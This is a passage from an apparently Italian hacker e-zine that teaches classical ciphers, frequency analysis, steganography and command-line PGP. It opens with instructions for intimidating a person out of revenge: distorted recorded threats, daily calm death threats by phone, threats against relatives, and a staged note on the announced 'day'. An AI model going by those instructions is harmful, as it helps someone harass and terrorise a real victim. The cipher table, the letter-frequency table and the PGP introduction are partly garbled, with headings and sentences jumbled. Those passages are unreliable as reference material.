gli parla delle api e dei fiori ;) -Registrate una risata, e un messaggio alquanto minaccioso. Con un waveeditor modificatela fino a farla diventare qualcosa di veramente macabro (tipo abbassare il tono, aggiungere un eco, ecc.) Telefonate e playate. Da fare per cominciare a spaventare uno stronzo che vi ha fatto qualcosa di brutto, e del quale volete vendicarvi, ovviamente poi dovra' venire la vendetta vera e propria, ma potete sempre prima farlo impazzire telefonando continuamente con messaggi di minaccia. -Anziche' modificare il suono della voce, parlate con tutta calma, e telefonate ogni giorno. Un tono calmo e formale associato ad una minaccia di morte fa molto piu' effetto. -Se volete proprio andarci un po' piu' pesante potete minacciare i parenti, oppure dire qualcosa del tipo "Venerdi' alle 10 e 30 tu sarai morto", ripetendolo ogni giorno. Venerdi' non chiamerete, ma farete in modo di fargli trovare un biglietto con su scritto : "Oggi e' il giorno" ElectroRipper ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°ÛÛ°°°°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°°°°ÛÛ°°°°ÛÛ°ÛÛ°ÛÛÛÛÛ°°°°°ÛÛÛÛÛ°°°°°°°°°°°°°°°°² ²°°°°°°°°ÛÛÛ°°°°ÛÛÛ°ÛÛ²²²ÛÛ°°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ²²ÛÛÛ°°°Û°°°°°°°°°°°°°°°°°°°°² ²°°°°°°°°ÛÛ°Û°°Û°ÛÛ°ÛÛÛÛÛÛÛ°°°°°°°ÛÛÛÛÛÛÛÛ°ÛÛ°ÛÛ²²²²ÛÛ°°ÛÛÛ°°°°°°°°°°°°°°°°°°² ²°°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°ÛÛ°ÛÛ°°°°°°°°°ÛÛ°°°°ÛÛ°ÛÛ°ÛÛ²²ÛÛÛ°°°Û°°°°°°°°°°°°°°°°°°°°² ²°°°°°°°°ÛÛ°°°°°°ÛÛ°ÛÛ°°ÛÛÛ°°ÛÛ°°°ÛÛ°°°°ÛÛ°ÛÛ°ÛÛÛÛÛ°°°°°ÛÛÛÛÛ°°°°°°°°°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ CRITTOGRAFIA ³º º³ /{~_~_~|ø__ø|~_~_~}\ ³º º³ UN PO' DI TEORIA E QUALKE METODO DA UTILIZZARE X FARSI UN PROGRAMMINO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ La crittografia spero sappiate tutti cosa sia, ma se no lo sapete essa secondo il mio vaccabolario e' un "sistema segreto di scrittura in cifra o codice". A quanti di voi verrebbe voglia di farsi un programmino in vb, delphi, c, pascal ma non sa come cifrare i propri messaggi? In questo articolo spieghero' alcune semplici tecniche, su una delle quali sto tentando di fare un prog di pascal e se lo finisco presto lo allego... --------------------------P R I M O E S E M P I O-------------------------- Allora un primo esempio di come cifrare i msg e' dato dalla scitala lacedemonica (che???) che e' un prototipo di cifrario a trasposizione, cioe' le lettere rimangono quelle che erano ma non dove erano. Questo metodo nacque ben 2500 anni fa, poiche' il governo spartano trasmetteva ai generali messaggi segreti in questo modo: il mittente avvolge a spirale un nastro di pergamena intorno al suo bastone cilindrico e scrive messaggi in righe longitudinali. Quando il nastro e' srotolato, la scrittura potra' essere letta solo dalla persona che ha un cilindro avente la stessa circonferenza. Un esempio puo' essere questo: CLEQHACUEEHEBZESEIETLN'A che parrebbe non significare nulla...ma provate a scrivere le lettere secondo una (circonferenza) c = 4 C L E Q H A C U E E H E B Z E S E I E T L N ' A Che ne dite? Non vi piace l'idea di nascondere le vs cose agli altri? Si' direte voi ma questo non ci vuole tanto x scoprirlo! ------------------------S E C O N D O E S E M P I O------------------------ Allora procediamo con Cesare (che c'entra Cesare? vedrete...) il buon caro vecchio Giulio Cesare (Ragazzi? hihihi) nella sua vita (tra il 100 e il 44 a.C) uso' un semplice metodo x crittografare i propri msg, con metodo del cifrario additivo. Il cifrario additivo usato da Cesare x esempio si ottiene scrivendo l'alfabeto cifrato sotto l'alfabeto in chiaro. Il cifrato si ottiene spostando le lettere di tot posizioni (x Cesare 3 a sinistra) come riportato nel seguente modo: Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Testo cifrato: D E F G H I J K L M N O P Q R S T U V W X Y Z A B C In questo modo se vogliamo scrivere CIAO NEWBIES scriveremo FLDR QHZELHV... ma purtroppo i limiti di questo metodo cono evidenti a causa dello scarso numero delle possibilita' (26) con le quali tentare di forzarlo. PS: riporto qua sotto la lista dei possibili cifrari additivi: a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z B C D E F G H I J K L M N O P Q R S T U V W X Y Z A C D E F G H I J K L M N O P Q R S T U V W X Y Z A B D E F G H I J K L M N O P Q R S T U V W X Y Z A B C E F G H I J K L M N O P Q R S T U V W X Y Z A B C D F G H I J K L M N O P Q R S T U V W X Y Z A B C D E G H I J K L M N O P Q R S T U V W X Y Z A B C D E F H I J K L M N O P Q R S T U V W X Y Z A B C D E F G I J K L M N O P Q R S T U V W X Y Z A B C D E F G H J K L M N O P Q R S T U V W X Y Z A B C D E F G H I K L M N O P Q R S T U V W X Y Z A B C D E F G H I J L M N O P Q R S T U V W X Y Z A B C D E F G H I J K M N O P Q R S T U V W X Y Z A B C D E F G H I J K L N O P Q R S T U V W X Y Z A B C D E F G H I J K L M O P Q R S T U V W X Y Z A B C D E F G H I J K L M N P Q R S T U V W X Y Z A B C D E F G H I J K L M N O --------------------------T E R Z O Q R S T U V W X Y Z A B C D E F G H I J K L M N O P R S T U V W X Y Z A B C D E F G H I J K L M N O P Q S T U V W X Y Z A B C D E F G H I J K L M N O P Q R T U V W X Y Z A B C D E F G H I J K L M N O P Q R S U V W X Y Z A B C D E F G H I J K L M N O P Q R S T V W X Y Z A B C D E F G H I J K L M N O P Q R S T U W X Y Z A B C D E F G H I J K L M N O P Q R S T U V X Y Z A B C D E F G H I J K L M N O P Q R S T U V W Y Z A B C D E F G H I J K L M N O P Q R S T U V W X Z A B C D E F G H I J K L M N O P Q R S T U V W X Y E S E M P I O-------------------------- Passiamo ora ad un altro metodo sul quale sto tentando di fare un programma e se ci riesco lo metto su questo num 2 se no rimando al terzo num... Il metodo a parola chiave corrisponde esattamente al cifrario additivo ma si differenzia x 3 motivi (ottimi!!!): - si utilizza una parola chiave - si utilizzano una lettera chiave (da a a z) o un numero (da 1 a 26) - ci sono infinite soluzioni, quindi e' difficilmente forzabile, ma non e' impossibile... Mettiamo ad esempio che voi abbiate scelto col vostro amico la parola chiave (che puo' essere usata solo x questa volta o x tutti i vs msg) e che questa risulti essere MITICO e poniamo il caso che abbiate scelto il numero 15. Adesso vediamo come fare, prima di tutto ci posizioniamo sulla 15a lettera: Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Testo cifrato: ^ Dopodiche dalla 15 in poi scriviamo tutte le lettere della parola chiave senza scrivere eventuali doppie (ovviamente): Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Testo cifrato: M I T C O Come potete notare non ho ripetuto la I come sopra spiegato...a questo punto basta inserire le altre lettere dell'alfabeto senza ovviamente quelle gia' immesse: Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Testo cifrato: J K L N P Q R S U V W X Y Z M I T C O A B D E F G H Spero che abbiate capito il metodo usato se no x chiarimenti contattatemi in mail :) Questo metodo imo e' abbastanza sicuro xche' ci sono infinite parole, e poi chi ci vieta di usare come parola chiave una cosa del tipo BRCIH ? Cmq non fidatevi troppo di questo metodo xche' se' e vero che attraverso i soliti metodi e ' difficilmente bucabile, attraverso l'analisi statistica si puo' sempre provare a forzare. -------------------------Q U A R T O E S E M P I O------------------------ Una cosa semplice che pochi credono valida, ma che aiuta molto se si vuole forzare un msg cifrato e l'uso dell'analisi statistica. In italiano come in qualsiasi lingua le lettere appaiono con piu' o meno frequenza, e quindi si puo' suddividerle in gruppi a seconda della loro frequenza relativa come riportato qui sotto (ricordo che non sono dati presi in giro e quindi potrebbero anke essere diversi, provate a leggere qualke libro sulla crittografia o sulla matematica probabilistica (esiste come materia?) x approfondire): ----------------------------------------------------------------Frequenze assolute e percentuali delle lettere singole (le frequenze percentuali sono arrotondate alla terza cifra decimale) ----------------------------------------------------------------LETTERA A B C D E F G H I L M N O P Q R FREQUENZA RELATIVA ---------------> 1714 ---------------> 160 ---------------> 637 ---------------> 566 ---------------> 658 ---------------> 141 ---------------> 272 ---------------> 160 ---------------> 1563 ---------------> 966 ---------------> 436 ---------------> 966 ---------------> 1486 ---------------> 421 ---------------> 85 ---------------> 978 0,114 0,011 0,042 0,038 0,111 0,009 0,018 0,011 0,104 0,064 0,029 0,064 0,099 0,028 0,006 0,065 S ---------------> 771 0,051 T ---------------> 1024 0,068 U ---------------> 528 0,035 V ---------------> 343 0,023 Z ---------------> 123 0,008 ----------------------------------------------------------------Totali 14998 0,998 ----------------------------------------------------------------Ora che avete le frequenze relative alle lettere della ns lingua :P potrete cercare di forzare qualke codice...solo x testarne il grado di sicurezza ovviamente {|;-) -------------------------Q U I N T O E S E M P I O------------------------ Cifrario a grata questo sconosciuto. Come funziona un cifrario a grata? Il modo migliore x spiegarlo e' darne un esempio pratico. Cosa riuscite a leggere? C T K B T P I E A F R C I R P T E O J R G F U A A H I W A M G A D X I E Sembra non ci sia niente ma se vi faccio vedere quello che c'e' scritto... C R I T T O G R A F I A ..capite subito :) Di metodi ce ne sono molti,a ma che ne dite di crearne di nuovi? Se avete qualke idea mandatemi un msg a [email protected] e potremo collaborare a qualche nuovo prog x cifrare e decifrare (quanto costa? na cifra....hihihi) oppure a qualke prog x calcolare la frequenza delle lettere in un determinato testo. --------------------------S E S T O E S E M P I O------------------------- Un problema, come abbiamo visto, x i metodi semplici x criptare i ns msg (ma che puo' anke esserci d'aiuto) e' la frequenza delle lettere...ma come fare per evitare che gli altri usino questo metodo delle possibilita' e delle frequenze? Semplicemente bastera' annullare le frequenze assegnando ad ogni lettera un num o + a seconda delle loro apparizioni :) Usiamo ad esempio, un metodo con il quale i simboli dell'alfabeto cifrato sono le cento coppie fromate da 00 a 99 come riportato qui sotto: a b c d e f g h i j k l m n o p q r s t v w x y : : : : : : : : : : : : : : : : : : : : : : : : 10, 24 15, 23, 02, 33 76, 89 11, 18, 25, 38, 39, 45, 49, 54, 62, 84 00, 22, 04, 08, 05, 94 01, 12, 13, 07, 65 20, 98 30, 21, 06, 35, 36, 53, 68, 80 26, 67, 14, 16, 51, 55, 70, 75, 78 86, 93, 96, 99 29, 41, 56, 63 40 46, 85, 88 31, 44, 61 03, 09, 17, 32, 52, 57, 69, 77 83, 87, 91, 95 82 19, 37, 43, 47, 48, 66, 73, 74, 81, 90, 97 34, 60, 64, 72 28, 42, 58, 59, 71, 79, 92 50 z : 27 Questo e' un esempio di cifrario omofonico. Adesso devo andare che l'ultima volta i vicini si sono lamentati "xhe' alle 2 di notte sentivamo il ticchettio dei tasti della tastiera"... poi si chiedono xche' la gente vuole fare il referendum x l'omicidio legalizzato dei vicini di casa...hihihihi PS: x la cronaca in questo momento ho 5 di orale e 5 di scritto di matematica e quindi se avete problemi scrivetemi ma mi sa che le domande toste le girero' a qualke altro componente del NewBies Staff :) eheheh ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ STEGANOGRAFIA FOR DUMMIES ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Per chi non conoscesse la "steganografia", gli basti sapere che e' un termine formato da due parole di origine greca "steganos"= "nascosto" e "grafos"= "scrittura", quindi scrittura nascosta; di origine greca per il semplice motivo che, come per la crittografia, essa ha origini antichissime e piu' tardi con le implementazioni informatiche ha avuto uno sviluppo che supera di molto le aspettative iniziali. Facciamo un piccolo esempio di steganografia....per chi avesse visto "Il nome della Rosa", o avesse fatto il boy-scout nulla di nuovo...prendete un foglio... ricopiateci a penna una ricetta di Suor Germana (hihihihi!)...fatto?....siete scemi!!! Prendete ora il foglio, uno stecchino, o meglio una stilografica vuota e ben pulita, ed un limone. Intingete ora, senza esagerare, la vostra "penna" nel limone e scrivete il vostro messaggio segreto. Nella regola dovreste scrivere il messaggio tra le righe della ricetta di Suor Germana, ma se non siete inseguiti dalla N.S.A. vi proporrei di scrivere il vostro messaggio in fondo alla pagina. Ora prendete un accendino e , molto delicatamente, esponete la parte di foglio in oggetto al calore della fiamma...et voila' il vostro segreto si materializzera' nel foglio. Vi suggerirei di sostituire il succo di limone, che emana un odore facilmente riconoscibile, (Fra Guglielmo lo sgama!!!) con del latte ed il risultato sara' lo stesso. Queste sostanze (latte limone ma anche altri inchiostri chimici) sono dette inchiostri "simpatici" e lo sono davvero!!!:) Altra tecnica steganografica (iniettiva) e' quella dell'acrostico, di origine antichissima, si deve la sua invenzione a Epicandro che soleva iniettare nelle sue poesie particolari messaggi che potevano venir letti isolando le lettere iniziali dei versi in senso verticale: Catene intorno al cielo mi indicano stelle che non sognano piu' All'alba di un eclissi io sogno, spero odio. [ciao] Facile no? E pensare che cose simili sono state usate fino alla seconda guerra mondiale. Torniamo a noi ed al nostro PC. Una delle tecniche maggiormente usate nel l'ambiente informatico e' quella della steganografia sostitutiva. Questa tecnica sfrutta il margine di errore (rumore) delle immagini e dei suoni, sostituendo i bit meno importanti con il nostro messaggio segreto. Prendiamo un immagine, e di questa immagine prendiamo un pixel che non sia determinante nell'immagine. Sostituiamo ai bit "di minor importanza" di questo colore il nostro messaggio segreto. Vi faccio un esempio riportando, se non sbaglio, quello di "Frank Sinapsi" mi scuserete la lamerata ma sono a scuola e sto facendo storia dell'arte e non me ne posso passa'!!!) Mettiamo di aver un pixel formato dalla tripletta (RGB): Red= 12 Green= 241 Blue= 19 Capirete che e' certamente un pixel di colore prevalentemente verde. Traducendo in binario la nostra tripletta verrebbe: 12= 00001100 241=11110001 19= 00010011 Arrivati a questo punto prendiamo i nostri bit meno importanti, che capirete sono quelli alla vostra destra (nell'es. 0-1-1). Ipotizziamo ora di voler nascondere il nostro messaggio che in sequenza binaria e' 1-0-0. Cosi' facendo la nostra tripletta mutera' in questo modo 13-240-18, sara' pertanto impossibile, vista la lieve modifica (sono sempre proporzionati ed il verde e' sempre padroneggiante), notare il cambiamento a occhio nudo pur avendo l'originale a portata di mano (8cchi). Questa e', molto semplicemente, la tecnica adoperata nella maggior parte dei programmi di steganografia. Se vi state chiedendo a cosa possa servirvi tutto questo sappiate che in alcuni paesi la crittografia e' illegale perche' attenta alla sicurezza nazionale (fottetevi!), sappiate che c'e' sempre qualcuno che vi guarda e che se avesse soltanto il sospetto che voi usiate la crittografia potrebbe avere automaticamente la certezza che voi nascondiate qualcosa di pericoloso per lui, per voi e per tutti quelli che hanno speso la loro vita a farsi i cazzi degli altri(!!). Se faro' in tempo troverete allegato a questo articolo un simpatico programmino, S-Tools 4, e se ce la faro' anche il manuale tradotto. Se N0body & C. crederanno che sia il caso di approfondire un po' l'argomento potrei fare un articolo un po' piu' tecnico nel prossimo numero e magari vi alleghero' anche il progetto della mia stilografica al latte :))) Comunque come sempre, tutto quello che ho scritto e' solo per "educational purpouse only" quindi non mi ritengo responsabile se davvero copiate la ricetta di Suor Germana (hahahahahah!!!) Per commenti e considerazioni varie [email protected] [email protected] ciao e a presto!!! Nietzsche "Solo chi ha il chaos dentro puo' partorire una stella danzante" F.W.N. ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ STEGANOGRAFIA CON IL PROGRAMMA IME ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ...Ragazzi qui stiamo parlando di steganografia..per maggiorni informazioni vale sempre la grande regola cercate, cercate, cercate...un piccolo suggerimento ve lo do'...Frank Sinapsi da Kriptonite....non e' molto semplice ma spiega perfettamente di cosa stiamo parlando. Il file allegato e' IME 47,6 K [non vorrei che N0bodY88 avesse fatto qualche scherzo :)))hihihi] un programmino non certo nuovo generato da un hacker di nome Christian, non e' sicuramente uno dei migliori ma e' molto facile, veloce e funziona bene. Serve per crittare e nascondere messaggi in un'immagine (JPG). Vi ho tradotto l'help anche se era davvero una stronzata....notate bene che non supporta il fullpath (quindi immagine e messaggio devono risiedere nella cartella dove avete copiato il programmino) e vi suggerisco di non provare a nascondere le vostre chiavi in quel modo (se non ricordo male ci ho provato ma con risultati deludenti). Un bug credo l'abbia, cioe', in caso di messaggi davvero corti anche nel caso si immettesse una password errata ci fara' vedere il testo in chiaro...ma badate bene che questo programma serve per non far sapere a nessuno se non al nostro interlocutore che ci stiamo scambiando messaggi e non foto di Pamela Anderson :) altrimenti con un brute force il nostro lavoro avrebbe sicuramente vita breve.....esercitatevi con le foto che sono in allegato e se riuscite...bhe' lo vedrete da voi........ ...vi auguro buon divertimento e come al solito per commenti etc [email protected] Nietzsche Image Mesage Encryptor ver 1.0 by Christian -Freeware- usate: IME <comando> [nomeimmagine.jpg] [password] [nomefileditesto.txt] comandi: c --> viene usato per creare una nuova immagine con il messaggio r --> viene usato per estrarre il messaggio da una immagine p --> verrebbe usato per purificare l'immagine dal messaggio ma in questa versione non e' possibile per esempio: per aggiungere un messaggio (segreto.txt) in una immagine chiamata pic1.jpg dovrete usare il comando: "ime c pic1.jpg pippo(hahaha) segreto.txt" (senza visgolette). Il Programma creera' una copia, nella directory di IME, del l'immagine originale nominata CRYPTED.jpg, che conterra' il messaggio crittato estratto dal file di testo (segreto.txt). Per leggere un messaggio da un' immagine usate il comando "ime r pic1.jpg pippo" Ime estrarra' nella sua directory il messaggio nascosto nell'immagine e lo chiamera' MESSAGE.txt. L'ultima funzione "p" che occorre per ripulire l'immagine dal messaggio non e' implementata in questa versione. "Di cio' di cui non vi e' piu' nulla da dire e' meglio tacere" -L.V.WittgenstainÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ CRITTOGRAFIA FOR DUMMIES ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ NASCONDETEVI DAL MONDO IN 6 MINUTI E 54 SECONDI NETTI Perche' usare la crittografia? Bhe' se non te lo sei mai chiesto a ben poco hai sempre avuto l'esigenza di nascondere le uno spacciatore di droga o un MR. Hide, o "i leggerli nessuno", allora la crittografia e' serve questo articolo, se invece tue chiappe al mondo perche' sei cazzi sono i miei e non deve l'isola che cercavi. Quale? Come quale? Forse ti riferisci al sistema? (parlo da solo!!!!) La crittografia, o meglio gli algoritmi che la rendono possibile, si dividono in due filoni quelli a chiave simmetrica e asimmetrica. Quelli ha chiave simmetrica permettono al mittente ed al destinatario di usare la stessa chiave per crittare e decrittare un testo. Il problema piu' grande che viene a crearsi con questo metodo valido e veloce, a mio parere, solo per l'archiviazione di dati, e' quello di potersi scambiare la chiave. Infatti, non sempre e' possibile incontrare materialmente il nostro interlocutore e allora come fare? Mandargliela per mail non mi sembra una buona scelta infatti essa puo' essere facilmente intercettata....per telefono ...ma dai!!!! E allora a risolvere tutti questi problemi arriva la chiave asimmetrica... vediamo.... La crittografia a chiave asimmetrica impone l'utilizzo di due chiavi una pubblica, che puo' essere distribuita, una segreta da conservare gelosamente. es. se marco vuole mandare un messaggio a Sara dovra' crittarlo con la chiave pubblica di Sara da quel momento nessuno (neanche marco) potra' decrittare il messaggio ad eccezione di Sara; infatti Sara prendera' questo messaggio e lo decrittera' con la sua chiave segreta!!! tutto chiaro? quindi si deduce che le due chiavi generate, pubblica e segreta, sono in stretta relazione tra loro ma sara' anche matematicamente certo che da una non si potra' arrivare all'altra! Il piu' famoso programma di crittografia che sfrutta sistemi asimmetrici e' il PGP (Pretty Good Privacy) per la sua storia vi rimando al suo sito e ad una breve ricerca in rete. Ne esistono diverse versioni, (io uso la 2.6.3i) piu'o meno intuitive. Fino ad oggi, credo, siamo arrivati alla 6.0 con interfaccia grafica e vari plug-in......ma il funzionamento e' pressoche' uguale... COME USARE IL PGP? Per prima cosa procuratevelo e' ovunque ma per essere piu' sicuro io andrei nella page ufficiale (www.pgpi.com) se avete scaricato la 5.x o la 6 fate partire il setup e aspettate ....se invece avete deciso la via piu' lunga ma molto piu' avvincente bhe' e' ora di installarlo....dopo averlo unzippato editate l'autoexec.bat ed aggiungete le seguenti istruzioni... SET PGPPATH=harddisk:\cartella (es. C:\pgp) SET TZ=MET-1DST (avete settato la time zone ) e riavviate il computer. Ora date un'occhiata al config.txt e' molto semplice e spiegato ricordate pero' che tutto cio' che e' preceduto dal cancelletto(#) non viene letto!!! quindi se volete spostare le vostre chiavi(fatelo!!!!!!) bastera' modificare il config.txt ok? Ora avete anche voi il pgp andate con il prompt sulla cartella dove lo avete installato e digitate "pgp -h" e cosi' potete avere tutti gli aiuti che vi servono.....leggetelo...leggetelo attentamente. Ora dobbiamo creare le nostre 2 chiavi ...ce l'ho anche con quelli della versione 5.x per voi e' facile!!!! vediamo eravamo nel prompt nella cartella del pgp digitate "pgp -kg" patapam ecco la schermata piu' importante, quella delle nostre chiavi...come vedrete il programma ci chiedera' a quanti bit dovra'generare la chiave... credo vi dara' 3 opportunita'....io sceglierei quella da 1024 che garantisce un ottima sicurezza e non e' lentissimo...ok ora bisognera' dargli l'userid per la chiave pubblica....immettere il vostro nome, il nick, uno pseudonimo, insomma quello che cazzo vi pare...potete anche mettere (ve lo consiglio vivamente) il vostro indirizzo di e-mail (credo tra apici <>) ok fatto?....adesso e' la volta della passphrase...ma che diavolo e'?....ragazzi...e' la chiave segreta e non metteteci pippo, dio, carmela, inter perche' altrimenti che cazzo avete generato a fare una chiave asimmetrica a 1024 bits.....ok ho esagerato ma sono cose che mi danno davvero fastidio e poi un po' di rispetto per la NSA...vi chiedera' di ridigitarla per conferma e se sbagliate non succedera' nulla ma vi fara' pensare molto!!!!! Adesso e' la volta di una cosa curiosa, il programma vi chiedera' di digitare tasti a caso....serve per generare la vostra chiave...il programma prendera' come casuale la distanza di tempo che passa tra una digitazione(cacafono) ed un'altra.....ringraziamenti vari...qualche attimo..ed il lavoro e' fatto avete le vostre due chiavi!!!! Pubring.pgp e Secring.pgp che saranno contenute nella cartella del vostro pgp e insieme formeranno il vostro keyring. Siamo a buon punto!!! Per crittare un file niente di piu' facile...torniamo al nostro prompt....la nostra cartella e digitiamo pgp -e nomefile.txt(nel caso il file non si trovasse nella directory del PGP andra' specificato tutto il percorso) Il PGP adesso ci chiedera' per chi dobbiamo crittare il file e ci fara' vedere le chiavi che abbiamo nel keyring...scegliete per provare la vostra chiave pubblica....ci siamo il pgp dopo qualche attimo creera' il nomefile (quello di prima).asc nella cartella dove si trova il testo in chiaro...abbiamo crittato il nostro file. Per decrittare un file (vi ricordo che deve essere stato crittato sulla vostra chiave pubblica) bastera' dare il comando pgp nomefile.asc...il PGP vi chiedera' la passphrase...digitatela ed il gioco e' fatto avete un file dello stesso nome ma senza estensioni. Bravi ora potete organizzare atti di terrorismo, campagne per la liberazione di SILVIA BARALDINI senza che nessuno lo sappia. Ora ultimo passo....importare ed esportare chiavi..... Per importare le chiavi..ottenuto il file via mail...dischetto...keyserver etc lo salveremo su un file con estensione .asc e daremo il comando "pgp -ka nomefile.asc" il PGP vi dira' che e' una chiave nuova e che manca di certificazione e vi chiedera' se vi fidiate...digitate "Y/N" (se ne siete sicuri!!!!!) fatto? avete aggiunto la chiave nel vostro keyring e lo vedete digitando il comando "pgp -kv". Al contrario se volete estrarre una chiave (ad esempio la vostra che dovete distribuire) dovrete digitare il comando "pgp -kxa" ...vi verra' richiesto di digitare l'userid della chiave da estrarre ...fatelo!!!....infine vi verra' richiesto il nome del file output...digitatelo( preferibilmente usate il vostro ID o un'abbreviazione che si ricorda meglio) con estensione ".asc" e se serve digitate il full path dell'output...fatto ora il mondo non puo' piu' scoprirvi!!!!! RIASSUNTO COMANDI (Copiato dal manuale di ZIMMERMANN) Per cifrare un testo in chiaro con la chiave pubblica del destinatario: pgp -e filetesto dest_ID Per firmare un testo in chiaro con la vostra chiave segreta: pgp -s filetesto [-u mio_ID] Per firmare un testo in chiaro con la vostra chiave segreta, e produrre un messaggio in chiaro firmato adatto ad essere spedito via e-mail: pgp -sta filetesto [-u mio_ID] Per firmare un testo in chiaro con la vostra chiave segreta, e poi cifrarlo con la chiave pubblica del destinatario: pgp -es filetesto dest_ID [-u mio_ID] Per cifrare un testo in chiaro con la crittografia convenzionale: pgp -c filetesto Per decifrare un file, o per controllare l'integrita' di un file firmato: pgp filecifrato [-o filechiaro] Per cifrare un messaggio per un numero qualunque di destinatari: pgp -e filetesto dest1_ID dest2_ID dest3_ID ....... Comandi di gestione delle chiavi: Per generare la vostra coppia di chiavi pubblica/segreta: pgp -kg Per aggiungere il contenuto di un file di chiavi pubbliche/segrete al vostro portachiavi pubblico/segreto: pgp -ka filechiavi [portachiavi] Per estrarre (copiare) una chiave dal vostro portachiavi pubblico o segreto: pgp -kx ID filechiavi [portachiavi] o: pgp -kxa ID filechiavi [portachiavi] Per vedere il contenuto del vostro portachiavi pubblico: pgp -kv[v] [ID] [portachiavi] Per vedere "l'impronta digitale" di una chiave pubblica, per verificarla al telefono con il suo proprietario: pgp -kvc [ID] [portachiavi] Per vedere il contenuto e verificare le firme del vostro portachiavi pubblico: pgp -kc [ID] [portachiavi] Per modificare l'ID o la frase chiave della vostra chiave segreta: pgp -ke ID [portachiavi] Per modificare i parametri di affidabilita' di una chiave pubblica: pgp -ke ID [portachiavi] Per rimuovere una chiave od un ID dal vostro portachiavi pubblico: pgp -kr ID [portachiavi] Per firmare e certificare una chiave altrui nel vostro portachiavi pubblico: pgp -ks suo_ID [-u mio_ID] [portachiavi] Per rimuovere delle 